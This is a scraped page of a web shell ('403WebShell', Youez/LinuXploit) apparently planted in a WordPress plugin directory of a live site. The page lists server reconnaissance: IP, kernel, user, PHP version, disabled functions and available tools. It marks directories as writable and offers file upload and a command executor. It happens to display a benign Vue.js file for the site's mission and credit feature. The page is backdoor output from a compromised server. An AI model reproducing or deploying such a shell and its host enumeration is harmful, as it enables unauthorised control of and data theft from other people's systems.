AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor


Warning: chmod(): Operation not permitted in /www/wwwroot/dzynews.com/wp-content/plugins/fileorganizer/fileorganizer.php on line 8
403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Assets/fontend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Assets/fontend//mission.js
var b2MissionPage = new Vue({
    el:'#mission',
    data:{
        mission:'',
        pages:{
            today:0,
            always:0
        },
        opt:{
            count:20,
            paged:1,
            type:'today'
        },
        url:'',
        api:'getMissionList',
        selecter:'.mission-page-list ul',
        list:''
    },
    mounted(){
        if(this.$refs.missionPage){
            this.getData()
            this.opt.paged = this.$refs.missionPage.getAttribute('data-paged');
            this.opt.type = this.$refs.missionPage.getAttribute('data-type');
            this.url = this.$refs.missionPage.getAttribute('data-url')+'/'+this.opt.type
            this.getList()
        }
    },
    methods:{
        change(type){
            this.opt.type = type
            if(this.url.indexOf('today') !== -1 || this.url.indexOf('always') !== -1){
                this.url = this.url.replace('today',type).replace('always',type)
            }else{
                this.url = this.url+'/'+type
            }
            this.opt.paged = 1
            this.getList()
        },
        getData(){
            this.mission = b2Mission
            this.opt.type = this.mission.type
            if(this.mission.data == ''){
                this.mission.getData(10)
            }
        },
        getList(){
            this.$refs.missionNav.go(this.opt.paged,'comment',true)
        },
        get(data){
            console.log(data)
            this.list = data.data
            this.pages[this.opt.type] = data.pages
        },
        tk(){

            payCredit.data = {
                'title':b2_global.js_text.global.mission_tk,
                'order_price':this.mission.data.mission.tk.credit,
                'order_type':'mission',
                'post_id':0
            }
            payCredit.user.credit = this.mission.data.mission.my_credit;
            payCredit.show = true;

        }
    }
})

Youez - 2016 - github.com/yon3zu
LinuXploit